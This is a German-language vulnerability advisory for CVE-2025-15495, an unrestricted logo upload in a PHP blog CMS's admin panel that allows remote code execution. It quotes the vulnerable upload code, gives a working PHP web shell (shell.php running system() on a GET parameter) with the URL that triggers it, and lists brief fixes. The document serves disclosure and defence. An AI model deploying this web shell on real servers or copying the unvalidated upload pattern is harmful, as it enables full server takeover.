
CVE-2025-15495 - Beliebiger Datei-Upload führt zu Remote-Code-Ausführung (RCE)
BiggiDroid – Simple PHP Blog CMS Produktseite: https://biggidroid.com/product/simple-php-blog/
Kritisch
CVSS (geschätzt): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Das Simple PHP Blog CMS enthält eine Schwachstelle durch uneingeschränkten Datei-Upload in der Funktion Site-Logo hochladen des Admin-Panels. Ein authentifizierter Angreifer kann eine bösartige PHP-Datei hochladen, die als Bild getarnt ist, in einem webzugänglichen Verzeichnis gespeichert und vom Server ausgeführt wird, was zu Remotebefehlsausführung führt.
Admin-Panel → Site-Logo aktualisieren
Relevanter verwundbarer Code-Ausschnitt:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
Erstelle eine Datei namens shell.php:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php als Logodatei hochladen📌 Die Anwendung akzeptiert die PHP-Datei ohne Validierung
Nach dem Upload ist die Datei erreichbar unter:
http://127.0.0.1/image/shell.php
Systembefehle ausführen:
http://127.0.0.1/image/shell.php?cmd=dir
Der Server führt Betriebssystembefehle aus und gibt die Ausgabe zurück, was Remote Code Execution bestätigt.





Ein Angreifer kann:
Diese Schwachstelle kann zur vollständigen Serverübernahme führen.
.htaccess / Server-HärtungDateierweiterungen einschränken
$allowed = ['jpg','jpeg','png','gif'];
MIME-Typ validieren
finfo_file()
Hochgeladene Dateien umbenennen